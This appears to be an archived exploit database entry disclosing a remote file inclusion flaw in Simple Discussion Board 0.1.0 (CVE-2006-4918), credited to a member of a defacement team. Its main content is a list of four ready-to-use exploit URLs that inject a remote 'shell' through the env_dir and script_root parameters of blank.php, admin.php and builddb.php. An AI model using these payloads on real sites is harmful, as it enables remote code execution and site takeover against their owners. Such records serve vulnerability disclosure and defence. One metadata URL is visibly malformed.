[] NeoSense

Simple Discussion Board 0.1.0 - Remote File Inclusion

Author: CeNGiZ-HaN
type: webapps
platform: php
port: 
date_added: 2006-09-18 
date_updated: 2016-09-09 
verified: 1 
codes: OSVDB-29043;CVE-2006-4918;OSVDB-29042;OSVDB-29041 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comsdb-0.1.0.tar.gz

Simple Discussion Board Multiple F.le Inclusion Vulnerability

credit: CeNGiZ-HaN
mail: cengiz-han@system-defacers.org
team: www.system-defacers.org
Script: Simple Discussion Board (sdb)
Download Adress:http://prdownloads.sourceforge.net/sdb/sdb-0.1.0.tar.gz
class: Remote
Risk: High

Exploit:

http://[target]/[path]/blank.php?env_dir=shell
http://[target]/[path]/blank.php?script_root=shell
http://[target]/[path]/admin.php?env_dir=shell
http://[target]/[path]/builddb.php?env_dir=shell


GreeTz No One ;)

# milw0rm.com [2006-09-19]